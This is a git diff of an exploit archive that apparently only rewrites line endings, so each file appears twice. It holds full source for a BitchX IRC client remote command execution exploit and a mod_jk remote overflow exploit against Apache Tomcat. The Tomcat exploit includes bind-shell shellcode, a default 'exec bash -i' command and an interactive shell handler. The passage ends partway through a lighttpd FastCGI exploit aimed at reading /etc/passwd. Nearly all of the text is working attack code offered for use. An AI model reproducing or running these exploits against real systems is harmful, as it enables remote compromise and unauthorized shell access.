:%s" - -typedef struct { - unsigned int hook_functions, - nickname, - star; - unsigned int base, diff, offset; -} Addresses; - -/* Partial structs full struct w/ correct values found in include/struct.h */ -// To be loaded into nickname static -typedef struct { - unsigned int name; // point to hook - unsigned int list; - // EXEC $1- 2 words -} HookFunc; - -// To be loaded into joined_nick static -typedef struct { -// unsigned int next; /* struct hook_stru *next; */ - unsigned int nick; /* char *nick; */ //star - unsigned int stuff; /* char *stuff; */ - unsigned int shit; -} Hook; - -char * make_nickname(Addresses *addrs, int X, int Y) { - char *tmp = NULL, *sp = NULL; - int i; - HookFunc h; - Hook hk; - - // malloc - tmp = (char *) malloc(1024); - - // BASE - h.name = addrs->star; - h.list = addrs->base - addrs->diff - 4; - - if (Y) { - // start loading string - if (X == 4) { - strcpy(tmp, NICK_STR); - } - else { - strcpy(tmp, ":"); - strcat(tmp, make_nickname(addrs, X + 1, 0)); - strcat(tmp, "!i"); - } - - sp = tmp + strlen(tmp); // point to char after tmp - //*sp++ = '0' + X; - strcpy(sp, NICK_STR2); - } - else { - sp = tmp; - *tmp = '\0'; - } - - hk.nick = addrs->star; - hk.stuff = addrs->base + 8; // "stuff" is loaded after the nick - - // load str - sp = tmp + strlen(tmp); // point to char after tmp - - memcpy(sp, &hk, sizeof(Hook)); - sp += sizeof(Hook) - 4; - - if (X != 4) { - while (X--) { - *sp++ = 'X'; - } - *sp++ = '\0'; - return tmp; - } - else { - while (X--) { - *sp++ = 'X'; - } - } - - - // pad - if (sizeof(Hook) > addrs->diff) { - printf("!!!!!!!!!!!!!ERRRRRRRRRRRRROOOOOOOOOOOOOOOOORRRRRRRRRRRRRRRRRR: %d\n", addrs->diff); - } - - for (i = sizeof(Hook); i < addrs->diff; ++i) - *sp++ = 'x'; - - memcpy(sp, &h, sizeof(HookFunc)); - sp += sizeof(HookFunc); - memcpy(sp, EXEC_STR, strlen(EXEC_STR)); - --sp[4]; - sp += strlen(EXEC_STR); - *++sp = '\0'; - - return tmp; -} - -//#define RAW_FMT_STR ":my_server %d bleh :%s" -char * make_raw(Addresses *addrs, char *cmd) { - char *tmp = NULL; - unsigned int len; - - len = 2000; // fix later - tmp = (char *) malloc(len); - - sprintf(tmp, RAW_FMT_STR, addrs->offset, cmd); - - return tmp; -} - -int main(int argc, char **argv) { - Addresses addrs; - char *cmd = argv[1]; - - addrs.hook_functions = HOOK_FUNCTIONS; - addrs.nickname = NICKNAME; - addrs.star = STAR; - - addrs.offset = ((NICKNAME - HOOK_FUNCTIONS) / 20) + 1; - addrs.diff = 20 - ((NICKNAME - HOOK_FUNCTIONS) % 20); - addrs.base = NICKNAME + addrs.diff; - - printf(":my_server 001 bleh :a\n"); - printf("%s\n", make_nickname(&addrs, 4, 1)); - printf("%s\n", make_nickname(&addrs, 3, 1)); - printf("%s\n", make_nickname(&addrs, 2, 1)); - printf("%s\n", make_nickname(&addrs, 1, 1)); - printf("%s\n", make_nickname(&addrs, 0, 1)); - printf("%s\n", make_raw(&addrs, cmd)); - - return 0; -} - -// milw0rm.com [2007-06-21] +/* Name: PBXS - Pointless BitchX Sploit + * Author: clarity_ + * Infected Versions: 1.1-final and others? + * Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one + * can inject data structures allowing for the remote execution of commands! + * Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx + * version connects to the mischievous server "ps -aux" will be executed. + * Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet + */ + +// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org +#define HOOK_FUNCTIONS 0x81366e0 +#define NICKNAME 0x8155353 +#define STAR 0x8108f34 + +#include +#include +#include + +#define NICK_STR ":bleh!i" +#define NICK_STR2 "@svun.powns.net NICK :" +#define EXEC_STR "EXEC $1-" +#define RAW_FMT_STR ":my_server -%u bleh :%s" + +typedef struct { + unsigned int hook_functions, + nickname, + star; + unsigned int base, diff, offset; +} Addresses; + +/* Partial structs full struct w/ correct values found in include/struct.h */ +// To be loaded into nickname static +typedef struct { + unsigned int name; // point to hook + unsigned int list; + // EXEC $1- 2 words +} HookFunc; + +// To be loaded into joined_nick static +typedef struct { +// unsigned int next; /* struct hook_stru *next; */ + unsigned int nick; /* char *nick; */ //star + unsigned int stuff; /* char *stuff; */ + unsigned int shit; +} Hook; + +char * make_nickname(Addresses *addrs, int X, int Y) { + char *tmp = NULL, *sp = NULL; + int i; + HookFunc h; + Hook hk; + + // malloc + tmp = (char *) malloc(1024); + + // BASE + h.name = addrs->star; + h.list = addrs->base - addrs->diff - 4; + + if (Y) { + // start loading string + if (X == 4) { + strcpy(tmp, NICK_STR); + } + else { + strcpy(tmp, ":"); + strcat(tmp, make_nickname(addrs, X + 1, 0)); + strcat(tmp, "!i"); + } + + sp = tmp + strlen(tmp); // point to char after tmp + //*sp++ = '0' + X; + strcpy(sp, NICK_STR2); + } + else { + sp = tmp; + *tmp = '\0'; + } + + hk.nick = addrs->star; + hk.stuff = addrs->base + 8; // "stuff" is loaded after the nick + + // load str + sp = tmp + strlen(tmp); // point to char after tmp + + memcpy(sp, &hk, sizeof(Hook)); + sp += sizeof(Hook) - 4; + + if (X != 4) { + while (X--) { + *sp++ = 'X'; + } + *sp++ = '\0'; + return tmp; + } + else { + while (X--) { + *sp++ = 'X'; + } + } + + + // pad + if (sizeof(Hook) > addrs->diff) { + printf("!!!!!!!!!!!!!ERRRRRRRRRRRRROOOOOOOOOOOOOOOOORRRRRRRRRRRRRRRRRR: %d\n", addrs->diff); + } + + for (i = sizeof(Hook); i < addrs->diff; ++i) + *sp++ = 'x'; + + memcpy(sp, &h, sizeof(HookFunc)); + sp += sizeof(HookFunc); + memcpy(sp, EXEC_STR, strlen(EXEC_STR)); + --sp[4]; + sp += strlen(EXEC_STR); + *++sp = '\0'; + + return tmp; +} + +//#define RAW_FMT_STR ":my_server %d bleh :%s" +char * make_raw(Addresses *addrs, char *cmd) { + char *tmp = NULL; + unsigned int len; + + len = 2000; // fix later + tmp = (char *) malloc(len); + + sprintf(tmp, RAW_FMT_STR, addrs->offset, cmd); + + return tmp; +} + +int main(int argc, char **argv) { + Addresses addrs; + char *cmd = argv[1]; + + addrs.hook_functions = HOOK_FUNCTIONS; + addrs.nickname = NICKNAME; + addrs.star = STAR; + + addrs.offset = ((NICKNAME - HOOK_FUNCTIONS) / 20) + 1; + addrs.diff = 20 - ((NICKNAME - HOOK_FUNCTIONS) % 20); + addrs.base = NICKNAME + addrs.diff; + + printf(":my_server 001 bleh :a\n"); + printf("%s\n", make_nickname(&addrs, 4, 1)); + printf("%s\n", make_nickname(&addrs, 3, 1)); + printf("%s\n", make_nickname(&addrs, 2, 1)); + printf("%s\n", make_nickname(&addrs, 1, 1)); + printf("%s\n", make_nickname(&addrs, 0, 1)); + printf("%s\n", make_raw(&addrs, cmd)); + + return 0; +} + +// milw0rm.com [2007-06-21] diff --git a/platforms/linux/remote/416.c b/platforms/linux/remote/416.c index 48e291a4d..997c9b8a9 100755 --- a/platforms/linux/remote/416.c +++ b/platforms/linux/remote/416.c @@ -123,6 +123,6 @@ target.cnt--; } while(target.cnt > 0); close(sock); return 0; -} - -// milw0rm.com [2004-08-25] +} + +// milw0rm.com [2004-08-25] diff --git a/platforms/linux/remote/4162.c b/platforms/linux/remote/4162.c index c32334288..f47cbafae 100755 --- a/platforms/linux/remote/4162.c +++ b/platforms/linux/remote/4162.c @@ -1,411 +1,411 @@ -/* -** -** Fedora Core 5,6 (exec-shield) based -** Apache Tomcat Connector (mod_jk) remote overflow exploit -** by Xpl017Elz -** -** Advanced exploitation in exec-shield (Fedora Core case study) -** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt -** -** Reference: http://www.securityfocus.com/bid/22791 -** vendor: http://tomcat.apache.org/ -** -** eliteboy's exploit (SUSE, Debian, FreeBSD): -** http://www.milw0rm.com/exploits/4093 -** -** Nicob 's exploit (Win32): -** http://downloads.securityfocus.com/vulnerabilities/exploits/apache_modjk_overflow.rb -** -** -- -** exploit by "you dong-hun"(Xpl017Elz), . -** My World: http://x82.inetcop.org -** -*/ - -#include -#include -#include -#include -#include -#include -#include -#ifdef __linux__ -#include -#endif - -#define MAP_URI_TO_WORKER_1_FC5 0x080474bc /* (0x2040),(0x201c) */ -#define MAP_URI_TO_WORKER_1_FC6 0x080476a4 /* (0x2040),(0x201c) */ -#define MAP_URI_TO_WORKER_2 0x82828282 -#define MAP_URI_TO_WORKER_3 0x08048014 - -/* parody */ -#define HOST_PARAM "0x82-apache-mod_jk.c" /* Host */ -#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, its GOBBLES style!';export TERM=vt100;exec bash -i\n" -#define PADDING_1 'A' -#define PADDING_2 'B' -#define PADDING_3 'C' -#define RET_ADDR_INC (0x2000) -#define SH_PORT 8282 - -char library_shellcode[]= - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - /* linux_ia32_bind - LPORT=8282 Size=108 Encoder=PexFnstenvSub http://metasploit.com */ - "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0" - "\x2c\x54\x7f\x83\xeb\xfc\xe2\xf4\xd1\xf7\x07\x3c\xb3\x46\x56\x15" - "\x86\x74\xcd\xf6\x01\xe1\xd4\xe9\xa3\x7e\x32\x17\xc0\x76\x32\x2c" - "\x69\xcd\x3e\x19\xb8\x7c\x05\x29\x69\xcd\x99\xff\x50\x4a\x85\x9c" - "\x2d\xac\x06\x2d\xb6\x6f\xdd\x9e\x50\x4a\x99\xff\x73\x46\x56\x26" - "\x50\x13\x99\xff\xa9\x55\xad\xcf\xeb\x7e\x3c\x50\xcf\x5f\x3c\x17" - "\xcf\x4e\x3d\x11\x69\xcf\x06\x2c\x69\xcd\x99\xff"; - -struct { - int num; - char *type; - int ret_count; - u_long retaddr; - u_long strcpy_plt; - int offset; - u_long pop_pop_pop_ret_code; - u_long pop_pop_ret_code; - u_long ret_code; - u_long worker_arg1; -} targets[] = { - {0,"Fedora Core release 5 (Bordeaux) - exec-shield\n" - "\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" - "\ttarball install: /usr/local/apache\n" - "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", - 3,0x100104,0x08060c80,4112,0x08060dc4,0,0,MAP_URI_TO_WORKER_1_FC5}, - - {1,"Fedora Core release 6 (Zod) - exec-shield\n" - "\tApache/2.0.49 (Unix) mod_jk/1.2.19\n" - "\ttarball install: /usr/local/apache\n" - "\tbinary install: mod_jk-apache-2.0.49-linux-i686.so", - 27,0x100104,0x0805fe74,4124,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6}, - - {2,"Fedora Core release 6 (Zod) - exec-shield\n" - "\tApache/2.0.49 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" - "\ttarball install: /usr/local/apache\n" - "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", - 23,0x100104,0x0805fe74,4112,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6}, - - {3,"Fedora Core release 6 (Zod) - exec-shield\n" - "\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" - "\ttarball install: /usr/local/apache\n" - "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", - 3,0x100104,0x08060164,4112,0x080614d4,0,0,MAP_URI_TO_WORKER_1_FC6}, -}, victim; - -void re_connt(int sock); -void conn_shell(int sock,char *cmdz); -void usage(char *argv0); -void banrl(); - -int main(int argc,char *argv[]){ - int sock; - int i=0,j=0,l=0,b=0; - unsigned char do_ex[8192]; - unsigned char ex_buf[8192*2]; - unsigned char sm_buf[4]; - char *hostp=NULL,*portp=NULL,*cmdz=DEFAULT_CMDZ; - - memset(&victim,0,sizeof(victim)); - banrl(); - while((i=getopt(argc,argv,"h:t:c:r:s:p:o:m:C:"))!=-1){ - switch(i){ - case 'h': - hostp=(char *)strtok(optarg,":"); - if((portp=(char *)strtok(NULL,":"))==NULL) - portp="80"; - break; - case 't': - if(atoi(optarg)>=sizeof(targets)/sizeof(victim)){ - usage(argv[0]); - return -1; - } - memcpy(&victim,&targets[atoi(optarg)],sizeof(victim)); - break; - case 'c': - victim.ret_count=atoi(optarg); - break; - case 'r': - victim.retaddr=strtoul(optarg,NULL,16); - break; - case 's': - victim.strcpy_plt=strtoul(optarg,NULL,16); - break; - case 'p': - victim.pop_pop_pop_ret_code=strtoul(optarg,NULL,16); - break; - case 'o': - victim.offset=atoi(optarg); - break; - case 'm': - victim.worker_arg1=strtoul(optarg,NULL,16); - break; - case 'C': - cmdz=optarg; - break; - default: - usage(argv[0]); - break; - } - } - if(!victim.ret_count||!victim.retaddr||!victim.strcpy_plt||!victim.offset||!victim.pop_pop_pop_ret_code||!victim.worker_arg1||!hostp||!portp){ - usage(argv[0]); - return -1; - } - - victim.pop_pop_ret_code=victim.pop_pop_pop_ret_code+1; - victim.ret_code=victim.pop_pop_pop_ret_code+3; - - printf("[*] os: %s\n\n",victim.type); - printf("[*] host: %s\n",hostp); - printf("[*] port: %s\n",portp); - printf("[*] count: %d\n",victim.ret_count); - printf("[*] strcpy@plt: %p\n",victim.strcpy_plt); - printf("[*] offset: %d\n",victim.offset); - printf("[*] pop_pop_pop_ret_code: %p\n",victim.pop_pop_pop_ret_code); - printf("[*] pop_pop_ret_code: %p\n",victim.pop_pop_ret_code); - printf("[*] ret_code: %p\n",victim.ret_code); - printf("[*] map_uri_to_worker() arg1: %p\n",victim.worker_arg1); - printf("[*] start retaddr: %p\n\n",victim.retaddr); - - putchar(';'); - srand(getpid()); - - for(b=0;;victim.retaddr+=RET_ADDR_INC){ - - putchar((rand()%2)? 'P':'p'); - fflush(stdout); - - usleep(100000); - - memset((char *)do_ex,0,sizeof(do_ex)); - memset((char *)ex_buf,0,sizeof(ex_buf)); - memset((char *)sm_buf,0,sizeof(sm_buf)); - -#define __GOGOSSING(dest,index,src){\ - *(long *)&dest[index]=src;\ - index+=4;\ -} - for(i=0;i0x08)&&(do_ex[j]<0x0e)){ - memset((char *)sm_buf,0,sizeof(sm_buf)); - sprintf(sm_buf,"%02x",do_ex[j]); - ex_buf[l++]='%'; - ex_buf[l++]=sm_buf[0]; - ex_buf[l++]=sm_buf[1]; - } - else ex_buf[l++]=do_ex[j]; - } - l=strlen(ex_buf); - sprintf(ex_buf+l," HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\n\r\n",library_shellcode,HOST_PARAM); - sock=setsock(hostp,atoi(portp)); - re_connt(sock); - send(sock,ex_buf,strlen(ex_buf),0); - close(sock); - - sock=setsock(hostp,SH_PORT); - if(sock!=-1){ - printf("\nTHIS IS KOREAAAAA~!: ret_count=%d, retaddr=%p, strcpy@plt=%p,\n" - "pop3/ret=%p, worker_arg1=%p\n\n",victim.ret_count,victim.retaddr, - victim.strcpy_plt,victim.pop_pop_pop_ret_code,victim.worker_arg1); - conn_shell(sock,cmdz); - exit(-1); - } - } -} - -int setsock(char *host,int port) -{ - int sock; - struct hostent *he; - struct sockaddr_in x82_addr; - - if((he=gethostbyname(host))==NULL) - { - return -1; - } - if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) - { - return -1; - } - x82_addr.sin_family=AF_INET; - x82_addr.sin_port=htons(port); - x82_addr.sin_addr=*((struct in_addr *)he->h_addr); - bzero(&(x82_addr.sin_zero),8); - - if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) - { - return -1; - } - return(sock); -} - -void re_connt(int sock) -{ - if(sock==-1) - { - printf("\n[-] "); - fflush(stdout); - perror("connect()"); - printf("[-] exploit failed.\n"); - exit(-1); - } -} - -void conn_shell(int sock,char *cmdz) -{ - int pckt; - char rbuf[1024]; - fd_set rset; - memset((char *)rbuf,0,1024); - send(sock,cmdz,strlen(cmdz),0); - - while(1) - { - fflush(stdout); - FD_ZERO(&rset); - FD_SET(sock,&rset); - FD_SET(STDIN_FILENO,&rset); - select(sock+1,&rset,NULL,NULL,NULL); - - if(FD_ISSET(sock,&rset)) - { - pckt=read(sock,rbuf,1024); - if(pckt<=0) - { - exit(0); - } - rbuf[pckt]=0; - printf("%s",rbuf); - } - if(FD_ISSET(STDIN_FILENO,&rset)) - { - pckt=read(STDIN_FILENO,rbuf,1024); - if(pckt>0) - { - rbuf[pckt]=0; - write(sock,rbuf,pckt); - } - } - } - return; -} - -void usage(char *argv0){ - int i; - - printf("Usage: %s <-switches> -h host[:80]\n",argv0); - printf(" -h host[:port]\tHost\n"); - printf(" -t number\t\tTarget id.\n"); - printf(" -c ret_count\t\tret count\n"); - printf(" -r retaddr\t\tstart library retaddr\n"); - printf(" -s strcpy@plt\t\tstrcpy plt address\n"); - printf(" -p pop3/ret\t\tpop3/ret address\n"); - printf(" -o offset\t\tOffset\n"); - printf(" -m worker_arg1\tmap_uri_to_worker() arg1\n"); - printf(" -C cmdz\t\tCommands\n"); - printf("\nExample: %s -t 0 -h apache_tomcat.target.kr\n",argv0); - printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n"); - printf(" ID / Return addr / Target specification\n"); - for(i=0;i's exploit (Win32): +** http://downloads.securityfocus.com/vulnerabilities/exploits/apache_modjk_overflow.rb +** +** -- +** exploit by "you dong-hun"(Xpl017Elz), . +** My World: http://x82.inetcop.org +** +*/ + +#include +#include +#include +#include +#include +#include +#include +#ifdef __linux__ +#include +#endif + +#define MAP_URI_TO_WORKER_1_FC5 0x080474bc /* (0x2040),(0x201c) */ +#define MAP_URI_TO_WORKER_1_FC6 0x080476a4 /* (0x2040),(0x201c) */ +#define MAP_URI_TO_WORKER_2 0x82828282 +#define MAP_URI_TO_WORKER_3 0x08048014 + +/* parody */ +#define HOST_PARAM "0x82-apache-mod_jk.c" /* Host */ +#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, its GOBBLES style!';export TERM=vt100;exec bash -i\n" +#define PADDING_1 'A' +#define PADDING_2 'B' +#define PADDING_3 'C' +#define RET_ADDR_INC (0x2000) +#define SH_PORT 8282 + +char library_shellcode[]= + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + /* linux_ia32_bind - LPORT=8282 Size=108 Encoder=PexFnstenvSub http://metasploit.com */ + "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0" + "\x2c\x54\x7f\x83\xeb\xfc\xe2\xf4\xd1\xf7\x07\x3c\xb3\x46\x56\x15" + "\x86\x74\xcd\xf6\x01\xe1\xd4\xe9\xa3\x7e\x32\x17\xc0\x76\x32\x2c" + "\x69\xcd\x3e\x19\xb8\x7c\x05\x29\x69\xcd\x99\xff\x50\x4a\x85\x9c" + "\x2d\xac\x06\x2d\xb6\x6f\xdd\x9e\x50\x4a\x99\xff\x73\x46\x56\x26" + "\x50\x13\x99\xff\xa9\x55\xad\xcf\xeb\x7e\x3c\x50\xcf\x5f\x3c\x17" + "\xcf\x4e\x3d\x11\x69\xcf\x06\x2c\x69\xcd\x99\xff"; + +struct { + int num; + char *type; + int ret_count; + u_long retaddr; + u_long strcpy_plt; + int offset; + u_long pop_pop_pop_ret_code; + u_long pop_pop_ret_code; + u_long ret_code; + u_long worker_arg1; +} targets[] = { + {0,"Fedora Core release 5 (Bordeaux) - exec-shield\n" + "\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" + "\ttarball install: /usr/local/apache\n" + "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", + 3,0x100104,0x08060c80,4112,0x08060dc4,0,0,MAP_URI_TO_WORKER_1_FC5}, + + {1,"Fedora Core release 6 (Zod) - exec-shield\n" + "\tApache/2.0.49 (Unix) mod_jk/1.2.19\n" + "\ttarball install: /usr/local/apache\n" + "\tbinary install: mod_jk-apache-2.0.49-linux-i686.so", + 27,0x100104,0x0805fe74,4124,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6}, + + {2,"Fedora Core release 6 (Zod) - exec-shield\n" + "\tApache/2.0.49 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" + "\ttarball install: /usr/local/apache\n" + "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", + 23,0x100104,0x0805fe74,4112,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6}, + + {3,"Fedora Core release 6 (Zod) - exec-shield\n" + "\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" + "\ttarball install: /usr/local/apache\n" + "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", + 3,0x100104,0x08060164,4112,0x080614d4,0,0,MAP_URI_TO_WORKER_1_FC6}, +}, victim; + +void re_connt(int sock); +void conn_shell(int sock,char *cmdz); +void usage(char *argv0); +void banrl(); + +int main(int argc,char *argv[]){ + int sock; + int i=0,j=0,l=0,b=0; + unsigned char do_ex[8192]; + unsigned char ex_buf[8192*2]; + unsigned char sm_buf[4]; + char *hostp=NULL,*portp=NULL,*cmdz=DEFAULT_CMDZ; + + memset(&victim,0,sizeof(victim)); + banrl(); + while((i=getopt(argc,argv,"h:t:c:r:s:p:o:m:C:"))!=-1){ + switch(i){ + case 'h': + hostp=(char *)strtok(optarg,":"); + if((portp=(char *)strtok(NULL,":"))==NULL) + portp="80"; + break; + case 't': + if(atoi(optarg)>=sizeof(targets)/sizeof(victim)){ + usage(argv[0]); + return -1; + } + memcpy(&victim,&targets[atoi(optarg)],sizeof(victim)); + break; + case 'c': + victim.ret_count=atoi(optarg); + break; + case 'r': + victim.retaddr=strtoul(optarg,NULL,16); + break; + case 's': + victim.strcpy_plt=strtoul(optarg,NULL,16); + break; + case 'p': + victim.pop_pop_pop_ret_code=strtoul(optarg,NULL,16); + break; + case 'o': + victim.offset=atoi(optarg); + break; + case 'm': + victim.worker_arg1=strtoul(optarg,NULL,16); + break; + case 'C': + cmdz=optarg; + break; + default: + usage(argv[0]); + break; + } + } + if(!victim.ret_count||!victim.retaddr||!victim.strcpy_plt||!victim.offset||!victim.pop_pop_pop_ret_code||!victim.worker_arg1||!hostp||!portp){ + usage(argv[0]); + return -1; + } + + victim.pop_pop_ret_code=victim.pop_pop_pop_ret_code+1; + victim.ret_code=victim.pop_pop_pop_ret_code+3; + + printf("[*] os: %s\n\n",victim.type); + printf("[*] host: %s\n",hostp); + printf("[*] port: %s\n",portp); + printf("[*] count: %d\n",victim.ret_count); + printf("[*] strcpy@plt: %p\n",victim.strcpy_plt); + printf("[*] offset: %d\n",victim.offset); + printf("[*] pop_pop_pop_ret_code: %p\n",victim.pop_pop_pop_ret_code); + printf("[*] pop_pop_ret_code: %p\n",victim.pop_pop_ret_code); + printf("[*] ret_code: %p\n",victim.ret_code); + printf("[*] map_uri_to_worker() arg1: %p\n",victim.worker_arg1); + printf("[*] start retaddr: %p\n\n",victim.retaddr); + + putchar(';'); + srand(getpid()); + + for(b=0;;victim.retaddr+=RET_ADDR_INC){ + + putchar((rand()%2)? 'P':'p'); + fflush(stdout); + + usleep(100000); + + memset((char *)do_ex,0,sizeof(do_ex)); + memset((char *)ex_buf,0,sizeof(ex_buf)); + memset((char *)sm_buf,0,sizeof(sm_buf)); + +#define __GOGOSSING(dest,index,src){\ + *(long *)&dest[index]=src;\ + index+=4;\ +} + for(i=0;i0x08)&&(do_ex[j]<0x0e)){ + memset((char *)sm_buf,0,sizeof(sm_buf)); + sprintf(sm_buf,"%02x",do_ex[j]); + ex_buf[l++]='%'; + ex_buf[l++]=sm_buf[0]; + ex_buf[l++]=sm_buf[1]; + } + else ex_buf[l++]=do_ex[j]; + } + l=strlen(ex_buf); + sprintf(ex_buf+l," HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\n\r\n",library_shellcode,HOST_PARAM); + sock=setsock(hostp,atoi(portp)); + re_connt(sock); + send(sock,ex_buf,strlen(ex_buf),0); + close(sock); + + sock=setsock(hostp,SH_PORT); + if(sock!=-1){ + printf("\nTHIS IS KOREAAAAA~!: ret_count=%d, retaddr=%p, strcpy@plt=%p,\n" + "pop3/ret=%p, worker_arg1=%p\n\n",victim.ret_count,victim.retaddr, + victim.strcpy_plt,victim.pop_pop_pop_ret_code,victim.worker_arg1); + conn_shell(sock,cmdz); + exit(-1); + } + } +} + +int setsock(char *host,int port) +{ + int sock; + struct hostent *he; + struct sockaddr_in x82_addr; + + if((he=gethostbyname(host))==NULL) + { + return -1; + } + if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) + { + return -1; + } + x82_addr.sin_family=AF_INET; + x82_addr.sin_port=htons(port); + x82_addr.sin_addr=*((struct in_addr *)he->h_addr); + bzero(&(x82_addr.sin_zero),8); + + if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) + { + return -1; + } + return(sock); +} + +void re_connt(int sock) +{ + if(sock==-1) + { + printf("\n[-] "); + fflush(stdout); + perror("connect()"); + printf("[-] exploit failed.\n"); + exit(-1); + } +} + +void conn_shell(int sock,char *cmdz) +{ + int pckt; + char rbuf[1024]; + fd_set rset; + memset((char *)rbuf,0,1024); + send(sock,cmdz,strlen(cmdz),0); + + while(1) + { + fflush(stdout); + FD_ZERO(&rset); + FD_SET(sock,&rset); + FD_SET(STDIN_FILENO,&rset); + select(sock+1,&rset,NULL,NULL,NULL); + + if(FD_ISSET(sock,&rset)) + { + pckt=read(sock,rbuf,1024); + if(pckt<=0) + { + exit(0); + } + rbuf[pckt]=0; + printf("%s",rbuf); + } + if(FD_ISSET(STDIN_FILENO,&rset)) + { + pckt=read(STDIN_FILENO,rbuf,1024); + if(pckt>0) + { + rbuf[pckt]=0; + write(sock,rbuf,pckt); + } + } + } + return; +} + +void usage(char *argv0){ + int i; + + printf("Usage: %s <-switches> -h host[:80]\n",argv0); + printf(" -h host[:port]\tHost\n"); + printf(" -t number\t\tTarget id.\n"); + printf(" -c ret_count\t\tret count\n"); + printf(" -r retaddr\t\tstart library retaddr\n"); + printf(" -s strcpy@plt\t\tstrcpy plt address\n"); + printf(" -p pop3/ret\t\tpop3/ret address\n"); + printf(" -o offset\t\tOffset\n"); + printf(" -m worker_arg1\tmap_uri_to_worker() arg1\n"); + printf(" -C cmdz\t\tCommands\n"); + printf("\nExample: %s -t 0 -h apache_tomcat.target.kr\n",argv0); + printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n"); + printf(" ID / Return addr / Target specification\n"); + for(i=0;i - * Philip Olausson - * http://www.secweb.se/en/advisories/lighttpd-fastcgi-remote-vulnerability/ - * - * FastCGI: - * http://www.fastcgi.com/devkit/doc/fcgi-spec.html - * - * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- - * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY - * DAMAGE DONE USING THIS PROGRAM. - * - * VOID.AT Security - * andi@void.at - * http://www.void.at - * - ************************************************************/ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/* don't change this values except you know exactly what you are doing */ -#define REQUEST_SIZE_BASE 0x1530a - -char FILL_CHAR[] = "void"; -char RANDOM_CHAR[] = "01234567890" - "abcdefghijklmnopqrstuvwxyz" - "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; - - -/* just default values */ -#define DEFAULT_SCRIPT "/index.php" /* can be changed via -s */ -#define DEFAULT_PORT "80" /* can be changed via -p */ -#define DEFAULT_NAME "SCRIPT_FILENAME" /* can be changed via -n */ -#define DEFAULT_VALUE "/etc/passwd" /* can be change via -a */ - -#define DEFAULT_SEPARATOR ',' - -#define BUFFER_SIZE 1024 - -/* header data type - * defining header name/value content and length - * if a fixed value is set use this one instead of generating content - */ -struct header_t { - int name_length; - char name_char; - int value_length; - char value_char; - char *value_value; -}; - -/* generate_param - * generate character array (input: comma separated list) - */ -char *generate_param(int *param_size_out, - char **name, - char **value) { - char *param = NULL; - int param_size = 0; - int param_offset = 0; - int i; - int name_length = 0; - int value_length = 0; - - for (i = 0; name[i] != NULL && value[i] != NULL; i++) { - name_length = strlen(name[i]); - value_length = strlen(value[i]); - if (name_length > 127) { - param_size += 4; - } else { - param_size++; - } - if (value_length > 127) { - param_size += 4; - } else { - param_size++; - } - param_size += strlen(name[i]) + strlen(value[i]); - param = realloc(param, param_size); - if (param) { - if (strlen(name[i]) > 127) { - param[param_offset++] = (name_length >> 24) | 0x80; - param[param_offset++] = (name_length >> 16) & 0xff; - param[param_offset++] = (name_length >> 8) & 0xff; - param[param_offset++] = name_length & 0xff; - } else { - param[param_offset++] = name_length; - } - if (strlen(value[i]) > 127) { - param[param_offset++] = (value_length >> 24) | 0x80; - param[param_offset++] = (value_length >> 16) & 0xff; - param[param_offset++] = (value_length >> 8) & 0xff; - param[param_offset++] = value_length & 0xff; - } else { - param[param_offset++] = value_length; - } - memcpy(param + param_offset, name[i], name_length); - param_offset += name_length; - memcpy(param + param_offset, value[i], value_length); - param_offset += value_length; - } - } - - if (param) { - *param_size_out = param_size; - } - - return param; -} - -/* generate_buffer - * generate header name or value buffer - */ -char *generate_buffer(int length, char c, int random_mode) { - char *buffer = (char*)malloc(length + 1); - int i; - - if (buffer) { - memset(buffer, 0, length + 1); - if (random_mode) { - for (i = 0; i < length; i++) { - buffer[i] = 